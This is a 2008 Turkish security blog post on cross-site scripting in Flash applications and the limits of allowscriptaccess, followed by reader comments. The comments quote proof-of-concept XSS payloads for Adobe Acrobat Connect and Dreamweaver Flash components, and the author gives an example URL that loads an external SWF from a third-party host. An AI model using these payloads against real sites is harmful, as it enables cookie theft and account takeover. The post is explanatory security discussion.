Flash, XSS ve allowscriptaccess

06.01.2008

Okuyucu : 947
Günlük Okuyucu : 7,1

Cuma günü özel bir konferansta sunum yaptım ek olarak diğer konulardan zevk alma şansı buldum. Konular Ring0 driver exploitation, Wireless Hacking, Auditing network devices, Java RMI gibi konuları içeriyordu. Ben de XSS açılarını bulma ve exploit etme konusunda bir sunum yaptım.

Sunum yeni bir şey içermemesine rağmen sadece sunum için Flash ve XSS konusuna değinmek istedim. İnternete girdim, bir arama ve bir sonuç ile bulduğum ilk Flash uygulamasında XSS vardı.

Özetle modern Flash uygulamalarında XSS inanılmaz derecede yaygın. Şu doküman benim bulduğum XSS' lerin genel componentlarda bulunmuşu. Dolayısıyla o dokümana bakarak neden bahsettiğimi anlayabilirsiniz.

Temel sorun dışarıdan yüklenen resource' ların filtrelenmemesi (şok! girdi filtreleme).

Son olarak eğer web sunucunuz swf dosyalarını normal flash dosyası olarak sunuyorsa allowscriptaccess işe yaramayacaktır! Çünkü dosyalara direk ulaşabiliyorsunuz, dolayısıyla HTML' deki allowscriptaccess hiç bir şeyi etkilemeyecektir.

Bir sorun olmazsa sunumu yakında yayınlayacağım. Pek vaktim yok, çok üstün körü bir yazı oldu ama umarım ana konuyu anlatabilmişimdir.

Yorumlar

Bu makalenin yorumlarını RSS ile takip et!

Konferansin diger sunumlari internette bulunabilir mi?

Mesut [ # | 06.01.2008 ]

Konferansin diger sunumlari internette bulunabilir mi?

Dedigim gibi konferans ozeldi, ama sanirim bir kismi yayinlayacak, public yayinlananlari siteye ben de koyabilirim. Sunumlardan biri de uncon ile ayni sunumdu ancak uncon da ozel bir konferans onun da sunumlari public olarak yayinlanmiyor.

Ferruh Mavituna [ # | 06.01.2008 ]

Eger flash XSS kosunuda Vuln. içeriyorsa benzer bir sekilde XSRF de olusabilir Mi ? Forum yazilimlarinda [FLash][/flash] gibi taglarin içine entegre edilmis bir sekilde mesela.

TunerX [ # | 06.01.2008 ]

Konuyu biraz daha acarsak sevindirici olabilir .. xxx.swf? den sonra yolanan veri ne gibi aciklara sebep olur ?

murar [ # | 07.01.2008 ]

Anladigim kadariyla her flash dosyasinin sonuna farkli kodlar girilmis.
Mesela;
Adobe Acrobat Connect (including Macromedia Breeze) için
main.swf?baseurl=asfunction:getURL,javascript:alert(1)//

Adobe Dreamweaver;
FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//

baseurl vede skinName bu uzantilari butun swf lerde gecerli mi yoksa programina gore degisiyor mu?

Acigin sebepleri sanirim kötü sahisli kisilerin cookie almalarini sagliyor, kendi swf dosyalarini koyabiliyorlar. Ingilizce olmadigi icin anladigim kadariyla boyle :)

users [ # | 07.01.2008 ]

Acigin etkisi XSS, yani XSS ile ne yapilabilirse bu durumda da o yapilabiliyor. Cookie calma bunlarda biri.

Benim kendi sunumumda kullandigim ve bahsettigim acik ayni sunun gibi :
http://www.example.com/Example_controller.swf?csPreloader=http://cannings.org/DoKnowEvil.swf%3f

Yani Flash disaridan bir baska dosya flash dosyasi yukluyor. Diger ornekler de bunun benzeri ama asfunction protocol unu kullaniyorlar.

Ferruh Mavituna [ # | 08.01.2008 ]

Operada calismiyor sanirim dimi..
Bu acigi sitemizde nasil engelleyebiliriz?

Not: Iki kere yazmis olabilirim kusuruma bakmayin.

users [ # | 08.01.2008 ]

benim aniyamadigim ordan gelen veri sadece flash içerisindeki donguyu etkilezmi ?

murat [ # | 10.01.2008 ]

dünyaya en yakin yildiz nedir?
bu soru ilkten çok zor gelebilir ama sonra dan anlayinca aa deyip sasiriyoruz kenmizce ben neden düsünemedim bunu diyorsunuz.en yakin yildiz günestir tabiiki.bizim için çok önemli olan günes bize isi veren isik, veren cisim bize en yakin yildizdir.bunda bilemeyecek birsey yok iyi günler veya iyi aksamlar.

esk li genç ibo [ # | 10.01.2008 ]

Yorum Ekle